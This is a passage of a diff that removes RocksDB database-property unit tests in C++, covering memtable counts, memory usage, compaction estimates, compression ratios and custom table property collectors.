-    ASSERT_EQ(num, "1");
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], "rocksdb.num-entries-imm-mem-tables", &num));
-    ASSERT_EQ(num, "2");
-    get_perf_context()->Reset();
-    Get(1, "k2");
-    ASSERT_EQ(2, static_cast<int>(get_perf_context()->get_from_memtable_count));
-    get_perf_context()->Reset();
-    Get(1, "k3");
-    ASSERT_EQ(1, static_cast<int>(get_perf_context()->get_from_memtable_count));
-    get_perf_context()->Reset();
-    Get(1, "k1");
-    ASSERT_EQ(3, static_cast<int>(get_perf_context()->get_from_memtable_count));
-
-    ASSERT_OK(Flush(1));
-    ASSERT_TRUE(dbfull()->GetProperty(handles_[1],
-                                      "rocksdb.num-immutable-mem-table", &num));
-    ASSERT_EQ(num, "0");
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], DB::Properties::kNumImmutableMemTableFlushed, &num));
-    ASSERT_EQ(num, "3");
-    ASSERT_TRUE(dbfull()->GetIntProperty(
-        handles_[1], "rocksdb.cur-size-active-mem-table", &value));
-    // "192" is the size of the metadata of two empty skiplists, this would
-    // break if we change the default skiplist implementation
-    ASSERT_GE(value, 192);
-
-    uint64_t int_num;
-    uint64_t base_total_size;
-    ASSERT_TRUE(dbfull()->GetIntProperty(
-        handles_[1], "rocksdb.estimate-num-keys", &base_total_size));
-
-    ASSERT_OK(dbfull()->Delete(writeOpt, handles_[1], "k2"));
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "k3", ""));
-    ASSERT_OK(dbfull()->Delete(writeOpt, handles_[1], "k3"));
-    ASSERT_TRUE(dbfull()->GetIntProperty(
-        handles_[1], "rocksdb.num-deletes-active-mem-table", &int_num));
-    ASSERT_EQ(int_num, 2U);
-    ASSERT_TRUE(dbfull()->GetIntProperty(
-        handles_[1], "rocksdb.num-entries-active-mem-table", &int_num));
-    ASSERT_EQ(int_num, 3U);
-
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "k2", big_value));
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "k2", big_value));
-    ASSERT_TRUE(dbfull()->GetIntProperty(
-        handles_[1], "rocksdb.num-entries-imm-mem-tables", &int_num));
-    ASSERT_EQ(int_num, 4U);
-    ASSERT_TRUE(dbfull()->GetIntProperty(
-        handles_[1], "rocksdb.num-deletes-imm-mem-tables", &int_num));
-    ASSERT_EQ(int_num, 2U);
-
-    ASSERT_TRUE(dbfull()->GetIntProperty(
-        handles_[1], "rocksdb.estimate-num-keys", &int_num));
-    ASSERT_EQ(int_num, base_total_size + 1);
-
-    SetPerfLevel(kDisable);
-    ASSERT_TRUE(GetPerfLevel() == kDisable);
-  } while (ChangeCompactOptions());
-}
-
-// TODO(techdept) : Disabled flaky test #12863555
-TEST_F(DBPropertiesTest, DISABLED_GetProperty) {
-  // Set sizes to both background thread pool to be 1 and block them.
-  env_->SetBackgroundThreads(1, Env::HIGH);
-  env_->SetBackgroundThreads(1, Env::LOW);
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-  test::SleepingBackgroundTask sleeping_task_high;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask,
-                 &sleeping_task_high, Env::Priority::HIGH);
-
-  Options options = CurrentOptions();
-  WriteOptions writeOpt = WriteOptions();
-  writeOpt.disableWAL = true;
-  options.compaction_style = kCompactionStyleUniversal;
-  options.level0_file_num_compaction_trigger = 1;
-  options.compaction_options_universal.size_ratio = 50;
-  options.max_background_compactions = 1;
-  options.max_background_flushes = 1;
-  options.max_write_buffer_number = 10;
-  options.min_write_buffer_number_to_merge = 1;
-  options.max_write_buffer_number_to_maintain = 0;
-  options.write_buffer_size = 1000000;
-  Reopen(options);
-
-  std::string big_value(1000000 * 2, 'x');
-  std::string num;
-  uint64_t int_num;
-  SetPerfLevel(kEnableTime);
-
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.estimate-table-readers-mem", &int_num));
-  ASSERT_EQ(int_num, 0U);
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.estimate-live-data-size", &int_num));
-  ASSERT_EQ(int_num, 0U);
-
-  ASSERT_OK(dbfull()->Put(writeOpt, "k1", big_value));
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.num-immutable-mem-table", &num));
-  ASSERT_EQ(num, "0");
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.mem-table-flush-pending", &num));
-  ASSERT_EQ(num, "0");
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.compaction-pending", &num));
-  ASSERT_EQ(num, "0");
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.estimate-num-keys", &num));
-  ASSERT_EQ(num, "1");
-  get_perf_context()->Reset();
-
-  ASSERT_OK(dbfull()->Put(writeOpt, "k2", big_value));
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.num-immutable-mem-table", &num));
-  ASSERT_EQ(num, "1");
-  ASSERT_OK(dbfull()->Delete(writeOpt, "k-non-existing"));
-  ASSERT_OK(dbfull()->Put(writeOpt, "k3", big_value));
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.num-immutable-mem-table", &num));
-  ASSERT_EQ(num, "2");
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.mem-table-flush-pending", &num));
-  ASSERT_EQ(num, "1");
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.compaction-pending", &num));
-  ASSERT_EQ(num, "0");
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.estimate-num-keys", &num));
-  ASSERT_EQ(num, "2");
-  // Verify the same set of properties through GetIntProperty
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.num-immutable-mem-table", &int_num));
-  ASSERT_EQ(int_num, 2U);
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.mem-table-flush-pending", &int_num));
-  ASSERT_EQ(int_num, 1U);
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.compaction-pending", &int_num));
-  ASSERT_EQ(int_num, 0U);
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.estimate-num-keys", &int_num));
-  ASSERT_EQ(int_num, 2U);
-
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.estimate-table-readers-mem", &int_num));
-  ASSERT_EQ(int_num, 0U);
-
-  sleeping_task_high.WakeUp();
-  sleeping_task_high.WaitUntilDone();
-  dbfull()->TEST_WaitForFlushMemTable();
-
-  ASSERT_OK(dbfull()->Put(writeOpt, "k4", big_value));
-  ASSERT_OK(dbfull()->Put(writeOpt, "k5", big_value));
-  dbfull()->TEST_WaitForFlushMemTable();
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.mem-table-flush-pending", &num));
-  ASSERT_EQ(num, "0");
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.compaction-pending", &num));
-  ASSERT_EQ(num, "1");
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.estimate-num-keys", &num));
-  ASSERT_EQ(num, "4");
-
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.estimate-table-readers-mem", &int_num));
-  ASSERT_GT(int_num, 0U);
-
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilDone();
-
-  // Wait for compaction to be done. This is important because otherwise RocksDB
-  // might schedule a compaction when reopening the database, failing assertion
-  // (A) as a result.
-  dbfull()->TEST_WaitForCompact();
-  options.max_open_files = 10;
-  Reopen(options);
-  // After reopening, no table reader is loaded, so no memory for table readers
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.estimate-table-readers-mem", &int_num));
-  ASSERT_EQ(int_num, 0U);  // (A)
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.estimate-num-keys", &int_num));
-  ASSERT_GT(int_num, 0U);
-
-  // After reading a key, at least one table reader is loaded.
-  Get("k5");
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.estimate-table-readers-mem", &int_num));
-  ASSERT_GT(int_num, 0U);
-
-  // Test rocksdb.num-live-versions
-  {
-    options.level0_file_num_compaction_trigger = 20;
-    Reopen(options);
-    ASSERT_TRUE(
-        dbfull()->GetIntProperty("rocksdb.num-live-versions", &int_num));
-    ASSERT_EQ(int_num, 1U);
-
-    // Use an iterator to hold current version
-    std::unique_ptr<Iterator> iter1(dbfull()->NewIterator(ReadOptions()));
-
-    ASSERT_OK(dbfull()->Put(writeOpt, "k6", big_value));
-    Flush();
-    ASSERT_TRUE(
-        dbfull()->GetIntProperty("rocksdb.num-live-versions", &int_num));
-    ASSERT_EQ(int_num, 2U);
-
-    // Use an iterator to hold current version
-    std::unique_ptr<Iterator> iter2(dbfull()->NewIterator(ReadOptions()));
-
-    ASSERT_OK(dbfull()->Put(writeOpt, "k7", big_value));
-    Flush();
-    ASSERT_TRUE(
-        dbfull()->GetIntProperty("rocksdb.num-live-versions", &int_num));
-    ASSERT_EQ(int_num, 3U);
-
-    iter2.reset();
-    ASSERT_TRUE(
-        dbfull()->GetIntProperty("rocksdb.num-live-versions", &int_num));
-    ASSERT_EQ(int_num, 2U);
-
-    iter1.reset();
-    ASSERT_TRUE(
-        dbfull()->GetIntProperty("rocksdb.num-live-versions", &int_num));
-    ASSERT_EQ(int_num, 1U);
-  }
-}
-
-TEST_F(DBPropertiesTest, ApproximateMemoryUsage) {
-  const int kNumRounds = 10;
-  // TODO(noetzli) kFlushesPerRound does not really correlate with how many
-  // flushes happen.
-  const int kFlushesPerRound = 10;
-  const int kWritesPerFlush = 10;
-  const int kKeySize = 100;
-  const int kValueSize = 1000;
-  Options options;
-  options.write_buffer_size = 1000;  // small write buffer
-  options.min_write_buffer_number_to_merge = 4;
-  options.compression = kNoCompression;
-  options.create_if_missing = true;
-  options = CurrentOptions(options);
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-
-  std::vector<Iterator*> iters;
-
-  uint64_t active_mem;
-  uint64_t unflushed_mem;
-  uint64_t all_mem;
-  uint64_t prev_all_mem;
-
-  // Phase 0. The verify the initial value of all these properties are the same
-  // as we have no mem-tables.
-  dbfull()->GetIntProperty("rocksdb.cur-size-active-mem-table", &active_mem);
-  dbfull()->GetIntProperty("rocksdb.cur-size-all-mem-tables", &unflushed_mem);
-  dbfull()->GetIntProperty("rocksdb.size-all-mem-tables", &all_mem);
-  ASSERT_EQ(all_mem, active_mem);
-  ASSERT_EQ(all_mem, unflushed_mem);
-
-  // Phase 1. Simply issue Put() and expect "cur-size-all-mem-tables" equals to
-  // "size-all-mem-tables"
-  for (int r = 0; r < kNumRounds; ++r) {
-    for (int f = 0; f < kFlushesPerRound; ++f) {
-      for (int w = 0; w < kWritesPerFlush; ++w) {
-        Put(RandomString(&rnd, kKeySize), RandomString(&rnd, kValueSize));
-      }
-    }
-    // Make sure that there is no flush between getting the two properties.
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->GetIntProperty("rocksdb.cur-size-all-mem-tables", &unflushed_mem);
-    dbfull()->GetIntProperty("rocksdb.size-all-mem-tables", &all_mem);
-    // in no iterator case, these two number should be the same.
-    ASSERT_EQ(unflushed_mem, all_mem);
-  }
-  prev_all_mem = all_mem;
-
-  // Phase 2. Keep issuing Put() but also create new iterators. This time we
-  // expect "size-all-mem-tables" > "cur-size-all-mem-tables".
-  for (int r = 0; r < kNumRounds; ++r) {
-    iters.push_back(db_->NewIterator(ReadOptions()));
-    for (int f = 0; f < kFlushesPerRound; ++f) {
-      for (int w = 0; w < kWritesPerFlush; ++w) {
-        Put(RandomString(&rnd, kKeySize), RandomString(&rnd, kValueSize));
-      }
-    }
-    // Force flush to prevent flush from happening between getting the
-    // properties or after getting the properties and before the new round.
-    Flush();
-
-    // In the second round, add iterators.
-    dbfull()->GetIntProperty("rocksdb.cur-size-active-mem-table", &active_mem);
-    dbfull()->GetIntProperty("rocksdb.cur-size-all-mem-tables", &unflushed_mem);
-    dbfull()->GetIntProperty("rocksdb.size-all-mem-tables", &all_mem);
-    ASSERT_GT(all_mem, active_mem);
-    ASSERT_GT(all_mem, unflushed_mem);
-    ASSERT_GT(all_mem, prev_all_mem);
-    prev_all_mem = all_mem;
-  }
-
-  // Phase 3. Delete iterators and expect "size-all-mem-tables" shrinks
-  // whenever we release an iterator.
-  for (auto* iter : iters) {
-    delete iter;
-    dbfull()->GetIntProperty("rocksdb.size-all-mem-tables", &all_mem);
-    // Expect the size shrinking
-    ASSERT_LT(all_mem, prev_all_mem);
-    prev_all_mem = all_mem;
-  }
-
-  // Expect all these three counters to be the same.
-  dbfull()->GetIntProperty("rocksdb.cur-size-active-mem-table", &active_mem);
-  dbfull()->GetIntProperty("rocksdb.cur-size-all-mem-tables", &unflushed_mem);
-  dbfull()->GetIntProperty("rocksdb.size-all-mem-tables", &all_mem);
-  ASSERT_EQ(active_mem, unflushed_mem);
-  ASSERT_EQ(unflushed_mem, all_mem);
-
-  // Phase 5. Reopen, and expect all these three counters to be the same again.
-  Reopen(options);
-  dbfull()->GetIntProperty("rocksdb.cur-size-active-mem-table", &active_mem);
-  dbfull()->GetIntProperty("rocksdb.cur-size-all-mem-tables", &unflushed_mem);
-  dbfull()->GetIntProperty("rocksdb.size-all-mem-tables", &all_mem);
-  ASSERT_EQ(active_mem, unflushed_mem);
-  ASSERT_EQ(unflushed_mem, all_mem);
-}
-
-TEST_F(DBPropertiesTest, EstimatePendingCompBytes) {
-  // Set sizes to both background thread pool to be 1 and block them.
-  env_->SetBackgroundThreads(1, Env::HIGH);
-  env_->SetBackgroundThreads(1, Env::LOW);
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-
-  Options options = CurrentOptions();
-  WriteOptions writeOpt = WriteOptions();
-  writeOpt.disableWAL = true;
-  options.compaction_style = kCompactionStyleLevel;
-  options.level0_file_num_compaction_trigger = 2;
-  options.max_background_compactions = 1;
-  options.max_background_flushes = 1;
-  options.max_write_buffer_number = 10;
-  options.min_write_buffer_number_to_merge = 1;
-  options.max_write_buffer_number_to_maintain = 0;
-  options.write_buffer_size = 1000000;
-  Reopen(options);
-
-  std::string big_value(1000000 * 2, 'x');
-  std::string num;
-  uint64_t int_num;
-
-  ASSERT_OK(dbfull()->Put(writeOpt, "k1", big_value));
-  Flush();
-  ASSERT_TRUE(dbfull()->GetIntProperty(
-      "rocksdb.estimate-pending-compaction-bytes", &int_num));
-  ASSERT_EQ(int_num, 0U);
-
-  ASSERT_OK(dbfull()->Put(writeOpt, "k2", big_value));
-  Flush();
-  ASSERT_TRUE(dbfull()->GetIntProperty(
-      "rocksdb.estimate-pending-compaction-bytes", &int_num));
-  ASSERT_GT(int_num, 0U);
-
-  ASSERT_OK(dbfull()->Put(writeOpt, "k3", big_value));
-  Flush();
-  ASSERT_TRUE(dbfull()->GetIntProperty(
-      "rocksdb.estimate-pending-compaction-bytes", &int_num));
-  ASSERT_GT(int_num, 0U);
-
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilDone();
-
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_TRUE(dbfull()->GetIntProperty(
-      "rocksdb.estimate-pending-compaction-bytes", &int_num));
-  ASSERT_EQ(int_num, 0U);
-}
-
-TEST_F(DBPropertiesTest, EstimateCompressionRatio) {
-  if (!Snappy_Supported()) {
-    return;
-  }
-  const int kNumL0Files = 3;
-  const int kNumEntriesPerFile = 1000;
-
-  Options options = CurrentOptions();
-  options.compression_per_level = {kNoCompression, kSnappyCompression};
-  options.disable_auto_compactions = true;
-  options.num_levels = 2;
-  Reopen(options);
-
-  // compression ratio is -1.0 when no open files at level
-  ASSERT_EQ(CompressionRatioAtLevel(0), -1.0);
-
-  const std::string kVal(100, 'a');
-  for (int i = 0; i < kNumL0Files; ++i) {
-    for (int j = 0; j < kNumEntriesPerFile; ++j) {
-      // Put common data ("key") at end to prevent delta encoding from
-      // compressing the key effectively
-      std::string key = ToString(i) + ToString(j) + "key";
-      ASSERT_OK(dbfull()->Put(WriteOptions(), key, kVal));
-    }
-    Flush();
-  }
-
-  // no compression at L0, so ratio is less than one
-  ASSERT_LT(CompressionRatioAtLevel(0), 1.0);
-  ASSERT_GT(CompressionRatioAtLevel(0), 0.0);
-  ASSERT_EQ(CompressionRatioAtLevel(1), -1.0);
-
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr);
-
-  ASSERT_EQ(CompressionRatioAtLevel(0), -1.0);
-  // Data at L1 should be highly compressed thanks to Snappy and redundant data
-  // in values (ratio is 12.846 as of 4/19/2016).
-  ASSERT_GT(CompressionRatioAtLevel(1), 10.0);
-}
-
-#endif  // ROCKSDB_LITE
-
-class CountingUserTblPropCollector : public TablePropertiesCollector {
- public:
-  const char* Name() const override { return "CountingUserTblPropCollector"; }
-
-  Status Finish(UserCollectedProperties* properties) override {
-    std::string encoded;
-    PutVarint32(&encoded, count_);
-    *properties = UserCollectedProperties{
-        {"CountingUserTblPropCollector", message_}, {"Count", encoded},
-    };
-    return Status::OK();
-  }
-
-  Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type,
-                    SequenceNumber seq, uint64_t file_size) override {
-    ++count_;
-    return Status::OK();
-  }
-
-  virtual UserCollectedProperties GetReadableProperties() const override {
-    return UserCollectedProperties{};
-  }
-
- private:
-  std::string message_ = "Rocksdb";
-  uint32_t count_ = 0;
-};
-
-class CountingUserTblPropCollectorFactory
-    : public TablePropertiesCollectorFactory {
- public:
-  explicit CountingUserTblPropCollectorFactory(
-      uint32_t expected_column_family_id)
-      : expected_column_family_id_(expected_column_family_id),
-        num_created_(0) {}
-  virtual TablePropertiesCollector* CreateTablePropertiesCollector(
-      TablePropertiesCollectorFactory::Context context) override {
-    EXPECT_EQ(expected_column_family_id_, context.column_family_id);
-    num_created_++;
-    return new CountingUserTblPropCollector();
-  }
-  const char* Name() const override {
-    return "CountingUserTblPropCollectorFactory";
-  }
-  void set_expected_column_family_id(uint32_t v) {
-    expected_column_family_id_ = v;
-  }
-  uint32_t expected_column_family_id_;
-  uint32_t num_created_;
-};
-
-class CountingDeleteTabPropCollector : public TablePropertiesCollector {
- public:
-  const char* Name() const override { return "CountingDeleteTabPropCollector"; }
-
-  Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type,
-                    SequenceNumber seq, uint64_t file_size) override {
-    if (type == kEntryDelete) {
-      num_deletes_++;
-    }
-    return Status::OK();
-  }
-
-  bool NeedCompact() const override { return num_deletes_ > 10; }
-
-  UserCollectedProperties GetReadableProperties() const override {
-    return UserCollectedProperties{};
-  }
-
-  Status Finish(UserCollectedProperties* properties) override {
-    *properties =
-        UserCollectedProperties{{"num_delete", ToString(num_deletes_)}};
-    return Status::OK();
-  }
-
- private:
-  uint32_t num_deletes_ = 0;
-};
-
-class CountingDeleteTabPropCollectorFactory
-    : public TablePropertiesCollectorFactory {
- public:
-  virtual TablePropertiesCollector* CreateTablePropertiesCollector(
-      TablePropertiesCollectorFactory::Context context) override {
-    return new CountingDeleteTabPropCollector();
-  }
-  const char* Name() const override {
-    return "CountingDeleteTabPropCollectorFactory";
-  }
-};
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBPropertiesTest, GetUserDefinedTableProperties) {
-  Options options = CurrentOptions();
-  options.level0_file_num_compaction_trigger = (1 << 30);
-  options.table_properties_collector_factories.resize(1);
-  std::shared_ptr<CountingUserTblPropCollectorFactory> collector_factory =
-      std::make_shared<CountingUserTblPropCollectorFactory>(0);
-  options.table_properties_collector_factories[0] = collector_factory;
-  Reopen(options);
-  // Create 4 tables
-  for (int table = 0; table < 4; ++table) {
-    for (int i = 0; i < 10 + table; ++i) {
-      db_->Put(WriteOptions(), ToString(table * 100 + i), "val");
-    }
-    db_->Flush(FlushOptions());
-  }
-
-  TablePropertiesCollection props;
-  ASSERT_OK(db_->GetPropertiesOfAllTables(&props));
-  ASSERT_EQ(4U, props.size());
-  uint32_t sum = 0;
-  for (const auto& item : props) {
-    auto& user_collected = item.second->user_collected_properties;
-    ASSERT_TRUE(user_collected.find("CountingUserTblPropCollector") !=
-                user_collected.end());
-    ASSERT_EQ(user_collected.at("CountingUserTblPropCollector"), "Rocksdb");
-    ASSERT_TRUE(user_collected.find("Count") != user_collected.end());
-    Slice key(user_collected.at("Count"));
-    uint32_t count;
-    ASSERT_TRUE(GetVarint32(&key, &count));
-    sum += count;
-  }
-  ASSERT_EQ(10u + 11u + 12u + 13u, sum);
-
-  ASSERT_GT(collector_factory->num_created_, 0U);
-  collector_factory->num_created_ = 0;
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr);
-  ASSERT_GT(collector_factory->num_created_, 0U);
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBPropertiesTest, UserDefinedTablePropertiesContext) {
-  Options options = CurrentOptions();
-  options.level0_file_num_compaction_trigger = 3;
-  options.table_properties_collector_factories.resize(1);
-  std::shared_ptr<CountingUserTblPropCollectorFactory> collector_factory =
-      std::make_shared<CountingUserTblPropCollectorFactory>(1);
-  options.table_properties_collector_factories[0] = collector_factory,
-  CreateAndReopenWithCF({"pikachu"}, options);
-  // Create 2 files
-  for (int table = 0; table < 2; ++table) {
-    for (int i = 0; i < 10 + table; ++i) {
-      Put(1, ToString(table * 100 + i), "val");
-    }
-    Flush(1);
-  }
-  ASSERT_GT(collector_factory->num_created_, 0U);
-
-  collector_factory->num_created_ = 0;
-  // Trigger automatic compactions.
-  for (int table = 0; table < 3; ++table) {
-    for (int i = 0; i < 10 + table; ++i) {
-      Put(1, ToString(table * 100 + i), "val");
-    }
-    Flush(1);
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_GT(collector_factory->num_created_, 0U);
-
-  collector_factory->num_created_ = 0;
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1]);
-  ASSERT_GT(collector_factory->num_created_, 0U);
-
-  // Come back to write to default column family
-  collector_factory->num_created_ = 0;
-  collector_factory->set_expected_column_family_id(0);  // default CF
-  // Create 4 tables in default column family
-  for (int table = 0; table < 2; ++table) {
-    for (int i = 0; i < 10 + table; ++i) {
-      Put(ToString(table * 100 + i), "val");
-    }
-    Flush();
-  }
-  ASSERT_GT(collector_factory->num_created_, 0U);
-
-  collector_factory->num_created_ = 0;
-  // Trigger automatic compactions.
-  for (int table = 0; table < 3; ++table) {
-    for (int i = 0; i < 10 + table; ++i) {
-      Put(ToString(table * 100 + i), "val");
-    }
-    Flush();
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_GT(collector_factory->num_created_, 0U);
-
-  collector_factory->num_created_ = 0;
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr);
-  ASSERT_GT(collector_factory->num_created_, 0U);
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBPropertiesTest, TablePropertiesNeedCompactTest) {
-  Random rnd(301);
-
-  Options options;
-  options.create_if_missing = true;
-  options.write_buffer_size = 4096;
-  options.max_write_buffer_number = 8;
-  options.level0_file_num_compaction_trigger = 2;
-  options.level0_slowdown_writes_trigger = 2;
-  options.level0_stop_writes_trigger = 4;
-  options.target_file_size_base = 2048;
-  options.max_bytes_for_level_base = 10240;
-  options.max_bytes_for_level_multiplier = 4;
-  options.soft_pending_compaction_bytes_limit = 1024 * 1024;
-  options.num_levels = 8;
-  options.env = env_;
-
-  std::shared_ptr<TablePropertiesCollectorFactory> collector_factory =
-      std::make_shared<CountingDeleteTabPropCollectorFactory>();
-  options.table_properties_collector_factories.resize(1);
-  options.table_properties_collector_factories[0] = collector_factory;
-
-  DestroyAndReopen(options);
-
-  const int kMaxKey = 1000;
-  for (int i = 0; i < kMaxKey; i++) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 102)));
-    ASSERT_OK(Put(Key(kMaxKey + i), RandomString(&rnd, 102)));
-  }
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-  if (NumTableFilesAtLevel(0) == 1) {
-    // Clear Level 0 so that when later flush a file with deletions,
-    // we don't trigger an organic compaction.
-    ASSERT_OK(Put(Key(0), ""));
-    ASSERT_OK(Put(Key(kMaxKey * 2), ""));
-    Flush();
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-
-  {
-    int c = 0;
-    std::unique_ptr<Iterator> iter(db_->NewIterator(ReadOptions()));
-    iter->Seek(Key(kMaxKey - 100));
-    while (iter->Valid() && iter->key().compare(Key(kMaxKey + 100)) < 0) {
-      iter->Next();
-      ++c;
-    }
-    ASSERT_EQ(c, 200);
-  }
-
-  Delete(Key(0));
-  for (int i = kMaxKey - 100; i < kMaxKey + 100; i++) {
-    Delete(Key(i));
-  }
-  Delete(Key(kMaxKey * 2));
-
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-
-  {
-    SetPerfLevel(kEnableCount);
-    get_perf_context()->Reset();
-    int c = 0;
-    std::unique_ptr<Iterator> iter(db_->NewIterator(ReadOptions()));
-    iter->Seek(Key(kMaxKey - 100));
-    while (iter->Valid() && iter->key().compare(Key(kMaxKey + 100)) < 0) {
-      iter->Next();
-    }
-    ASSERT_EQ(c, 0);
-    ASSERT_LT(get_perf_context()->internal_delete_skipped_count, 30u);
-    ASSERT_LT(get_perf_context()->internal_key_skipped_count, 30u);
-    SetPerfLevel(kDisable);
-  }
-}
-
-TEST_F(DBPropertiesTest, NeedCompactHintPersistentTest) {
-  Random rnd(301);
-
-  Options options;
-  options.create_if_missing = true;
-  options.max_write_buffer_number = 8;
-  options.level0_file_num_compaction_trigger = 10;
-  options.level0_slowdown_writes_trigger = 10;
-  options.level0_stop_writes_trigger = 10;
-  options.disable_auto_compactions = true;
-  options.env = env_;
-
-  std::shared_ptr<TablePropertiesCollectorFactory> collector_factory =
-      std::make_shared<CountingDeleteTabPropCollectorFactory>();
-  options.table_properties_collector_factories.resize(1);
-  options.table_properties_collector_factories[0] = collector_factory;
-
-  DestroyAndReopen(options);
-
-  const int kMaxKey = 100;
-  for (int i = 0; i < kMaxKey; i++) {
-    ASSERT_OK(Put(Key(i), ""));
-  }
-  Flush();
-  dbfull()->TEST_WaitForFlushMemTable();
-
-  for (int i = 1; i < kMaxKey - 1; i++) {
-    Delete(Key(i));
-  }
-  Flush();
-  dbfull()->TEST_WaitForFlushMemTable();
-  ASSERT_EQ(NumTableFilesAtLevel(0), 2);
-
-  // Restart the DB. Although number of files didn't reach
-  // options.level0_file_num_compaction_trigger, compaction should
-  // still be triggered because of the need-compaction hint.
-  options.disable_auto_compactions = false;
-  Reopen(options);
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-  {
-    SetPerfLevel(kEnableCount);
-    get_perf_context()->Reset();
-    int c = 0;
-    std::unique_ptr<Iterator> iter(db_->NewIterator(ReadOptions()));
-    for (iter->Seek(Key(0)); iter->Valid(); iter->Next()) {
-      c++;
-    }
-    ASSERT_EQ(c, 2);
-    ASSERT_EQ(get_perf_context()->internal_delete_skipped_count, 0);
-    // We iterate every key twice. Is it a bug?
-    ASSERT_LE(get_perf_context()->internal_key_skipped_count, 2);
-    SetPerfLevel(kDisable);
-  }
-}
-
-TEST_F(DBPropertiesTest, EstimateNumKeysUnderflow) {
-  Options options;
-  Reopen(options);
-  Put("foo", "bar");
-  Delete("foo");
-  Delete("foo");
-  uint64_t num_keys = 0;
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.estimate-num-keys", &num_keys));
-  ASSERT_EQ(0, num_keys);
-}
-
-TEST_F(DBPropertiesTest, EstimateOldestKeyTime) {
-  std::unique_ptr<MockTimeEnv> mock_env(new MockTimeEnv(Env::Default()));
-  uint64_t oldest_key_time = 0;
-  Options options;
-  options.env = mock_env.get();
-
-  // "rocksdb.estimate-oldest-key-time" only available to fifo compaction.
-  mock_env->set_current_time(100);
-  for (auto compaction : {kCompactionStyleLevel, kCompactionStyleUniversal,
-                          kCompactionStyleNone}) {
-    options.compaction_style = compaction;
-    options.create_if_missing = true;
-    DestroyAndReopen(options);
-    ASSERT_OK(Put("foo", "bar"));
-    ASSERT_FALSE(dbfull()->GetIntProperty(
-        DB::Properties::kEstimateOldestKeyTime, &oldest_key_time));
-  }
-
-  options.compaction_style = kCompactionStyleFIFO;
-  options.compaction_options_fifo.ttl = 300;
-  options.compaction_options_fifo.allow_compaction = false;
-  DestroyAndReopen(options);
-
-  mock_env->set_current_time(100);
-  ASSERT_OK(Put("k1", "v1"));
-  ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime,
-                                       &oldest_key_time));
-  ASSERT_EQ(100, oldest_key_time);
-  ASSERT_OK(Flush());
-  ASSERT_EQ("1", FilesPerLevel());
-  ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime,
-                                       &oldest_key_time));
-  ASSERT_EQ(100, oldest_key_time);
-
-  mock_env->set_current_time(200);
-  ASSERT_OK(Put("k2", "v2"));
-  ASSERT_OK(Flush());
-  ASSERT_EQ("2", FilesPerLevel());
-  ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime,
-                                       &oldest_key_time));
-  ASSERT_EQ(100, oldest_key_time);
-
-  mock_env->set_current_time(300);
-  ASSERT_OK(Put("k3", "v3"));
-  ASSERT_OK(Flush());
-  ASSERT_EQ("3", FilesPerLevel());
-  ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime,
-                                       &oldest_key_time));
-  ASSERT_EQ(100, oldest_key_time);
-
-  mock_env->set_current_time(450);
